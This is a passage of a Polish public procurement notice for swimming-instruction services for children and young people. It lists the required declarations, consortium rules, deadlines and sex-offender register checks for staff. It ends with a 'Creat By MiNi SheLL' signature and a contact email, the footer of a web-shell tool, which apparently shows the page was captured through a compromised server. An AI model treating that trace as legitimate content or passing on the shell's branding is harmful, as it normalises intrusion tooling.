Wykonawców wspólnie ubiegających się o zamówienie, których oferta została najwyżej oceniona obejmują:<br/>a) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w art. 108 ust. 1 pkt 3, 108 ust. 1 pkt , 108 ust. 1 pkt 5, 108 ust. 1 pkt 6, oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129) – załącznik nr 9a do SWZ.<br/>5. Podmiotowe środki dowodowe dla Wykonawcy polegającego na zasobach innych podmiotów:<br/>a) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby załącza do oferty:<br/>- oświadczenie podmiotu na zasoby, którego się powołuje Wykonawca o braku podstaw do wykluczenia – załącznik nr 4b do SWZ;<br/>- oświadczenie o braku podstaw do wykluczenia z postępowania, składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – załącznik nr 10 b do SWZ<br/>b) W przypadku gdy Wykonawca powołuje się na zasoby innych podmiotów Zamawiający będzie żądał od Wykonawcy, którego oferta została najwyżej oceniona oświadczenia – załącznik nr 9b potwierdzającego aktualność informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty na potwierdzenie spełnienia warunków udziału Wykonawca zobowiązany jest dołączyć oświadczenie o spełnieniu warunków<br/>udziału w postępowaniu – zgodnie z załącznikiem nr 3a do SWZ;<br/>2. Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta została najwyżej oceniona obejmują: Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 5 do SWZ;<br/>3. Podmiotowe środki dowodowe dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja) do<br/>oferty, składa każdy z Wykonawców:<br/>a) oświadczenie o spełnieniu warunków udziału w postępowaniu – zgodnie z załącznikiem nr 3a do SWZ;<br/>b) oświadczenie, z którego wynika, że usługi wykonują poszczególni Wykonawcy (zgodnie z załącznikiem 8 do SWZ – art. 117<br/>ustawy Pzp).<br/>4. Podmiotowe środki dowodowe wymagane od Wykonawców wspólnie ubiegających się o zamówienie, których oferta została najwyżej oceniona obejmuje: Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - Załącznik nr 5 do SWZ;<br/>5. Podmiotowe środki dowodowe dla Wykonawcy polegającego na zasobach innych podmiotów:<br/>a) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby załącza do oferty:<br/>- oświadczenie podmiotu na zasoby, którego się powołuje Wykonawca dotyczące spełnienia warunków udziału w postępowaniu –<br/>załącznik nr 3b do SWZ;<br/>- Zobowiązanie do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia – załącznik nr 7 do<br/>SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> b) Oświadczenie o spełnianiu warunków udziału w postępowaniu składane przez Wykonawcę – zał. Nr 3a do SWZ<br/>c) Oświadczenie o spełnianiu warunków udziału w postępowaniu składane przez podmiot na zasoby, którego powołuje się<br/>Wykonawca – zał. Nr 3b do SWZ – jeżeli dotyczy;<br/>d) Oświadczenie o braku podstaw do wykluczenia z postępowania składane przez Wykonawcę – zał. Nr 4a do SWZ;<br/>e) Oświadczenie o braku podstaw do wykluczenia z postępowania składane przez składane przez podmiot na zasoby,<br/>którego powołuje się Wykonawca – zał. Nr 4b do SWZ – jeżeli dotyczy;<br/>f) Zobowiązanie podmiotu trzeciego do oddania swego zasobu na potrzeby Wykonawcy składającego ofertę – zał. Nr 7 do SWZ - jeżeli dotyczy;<br/>g) Oświadczenie o podziale obowiązków w trakcie realizacji zamówienia, w przypadku podmiotów wspólnie ubiegających<br/>się o zamówienia publiczne – zał. Nr do SWZ - jeżeli dotyczy;<br/>h) Oświadczenie Wykonawcy składane na podstawie art. 7 ustawy o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służące ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz.<br/>507) – zał. nr 10a do SWZ;<br/>i) Oświadczenie podmiotu na zasoby, którego powołuje się Wykonawca składane na podstawie art. 7 ustawy o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służące ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) – zał. nr 10a do SWZ – jeżeli dotyczy;<br/><br/>1. Stosownie do treści art. 95 ust. 1 ustawy Prawo zamówień publicznych Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę, osób wykonujących czynności instruktora nauki pływania, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 roku kodeks pracy. Obowiązek ten nie dotyczy czynności, które są wykonywane przez Wykonawcę prowadzącego jednoosobową działalność gospodarczą. Wykonawca zobowiązany jest zapewnić wskazane powyżej zatrudnienie przez cały okres wykonania umowy.<br/>2. W terminie 14 dni roboczych od podpisania umowy Wykonawca zobowiązany jest do przedstawienia oświadczenia o zatrudnieniu na podstawie umowy o pracę osoby/osób wykonujących czynności, o których mowa w ust. 1. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ubiegający się wspólnie o zamówienie (spółki cywilne, konsorcja). <br/>a)	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy (lider konsorcjum). <br/>b)	Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu Wykonawcy i składając ofertę w zakładce „Wykonawca” doda pozostałych Wykonawców wpisując ich dane. Pełnomocnik konsorcjum pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną. <br/>c)	Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <br/>d)	Pełnomocnictwo powinno być załączone do oferty.<br/>2.	Podmiotowe środki dowodowe wymagane od Wykonawców wspólnie ubiegających się o zamówienie, których oferta została najwyżej oceniona obejmują: <br/>a)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 5 do SWZ;<br/>b)	oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w art. 108 ust. 1 pkt 3, 108 ust. 1 pkt , 108 ust. 1 pkt 5, 108 ust. 1 pkt 6, oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129) – załącznik nr 9a do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana umowy w stosunku do treści oferty złożonej przez Wykonawcę w trakcie postępowania <br/>o udzielenie zamówienia publicznego obejmującego przedmiot umowy dopuszczalna jest jedynie w zakresie:<br/>1)	zgodnie z zapisami art. 455 ust. 1 pkt 3);<br/>2)	zgodnie z zapisami art. 455 ust. 2.<br/>2.	Zmiany umowy nie stanowią:<br/>1)	zmiana wskazanych w umowie osób nadzorujących realizację przedmiotu umowy,<br/>2)	zmiana danych teleadresowych stron,<br/>3)	zmiana danych rejestrowych stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl poprzez formularz do komuniakcji</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający nie przewiduje możliwości ograniczenia liczby Wykonawców, których zaprosi do negocjacji <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej w celu potwierdzenia braku podstaw do wykluczenia zamiast odpisu z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp sporządzonego nie wcześniej niż 3 miesiące przed<br/>jego złożeniem (jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>2. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. g) zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym<br/>administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>3. Z uwagi na fakt, że zamówienie dotyczy pracy z dziećmi i młodzieżą, zgodnie z ustawą z dnia 13 maja 2016r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (tj. Dz.U. z 2023r. poz. 1304 ze zm.), Zamawiający nie dopuszcza realizacji zamówienia przez osobę figurującą w Rejestrze Sprawców Przestępstw na Tle<br/>Seksualnym lub skazanych za przestępstwa określone w art. 21 ww. ustawy. Osoby wykazane przez Wykonawcę do realizacji zamówienia zostaną zweryfikowane ww. rejestrze.<br/>4. Ponadto przed przystąpieniem do realizacji umowy, Wykonawca zobowiązany jest przedłożyć informację w stosunku do XIX i XXV Kodeksu Karnego, art. 189 a, 207 Kodeksu Karnego oraz w ustawie z dnia 29.07.2005 r. o przeciwdziałaniu narkomanii (Dz. U z 2023 r. poz. 1393) lub za odpowiadające tym przestępstwom czyny zabronione określone w przepisach prawa obcego. W stosunku do osób posiadających obywatelstwo innego państwa niż Rzeczypospolita Polska. Wykonawca<br/>przedkłada dokumenty, o których mowa w art. 21 ust. 4-8 ustawy z dnia 13 maja 2016 roku o przeciwdziałaniu zagrożeniom przestępczości na tle seksualnym z osobami małoletnimi (Dz. U.2024, poz. 1802).<br/>5. Zamawiający dokona sprawdzenia osób skierowanych przez Wykonawcę do realizacji umowy w Rejestrze Sprawców Przestępstw na Tle Seksualnym zgodnie z ustawą z dnia 13 maja 2016 roku o przeciwdziałaniu zagrożeniom<br/>przestępczością na tle seksualnym oraz sprawdzenie załączonych przez Wykonawcę przed rozpoczęciem realizacji umowy informacji z Krajowego Rejestru Karnego, w zakresie przestępstw określonych w rozdziale XIX i XXV Kodeksu Karnego, art. 189 a, 207 Kodeksu Karnego oraz w ustawie z dnia 29.07.2005 r. o przeciwdziałaniu narkomanii (Dz. U z 2023 r. poz. 1393)<br/>lub za odpowiadające tym przestępstwom czyny zabronione określone w przepisach prawa obcego. W stosunku do osób posiadających obywatelstwo innego państwa niż Rzeczypospolita Polska. Wykonawca przedkłada dokumenty, o których mowa w art. 21 ust. 4-8 ustawy z dnia 13 maja 2016 roku o przeciwdziałaniu zagrożeniom przestępczości na tle seksualnym<br/>z osobami małoletnimi (Dz. U.2024, poz. 1802).

Creat By MiNi SheLL
Email: jattceo@gmail.com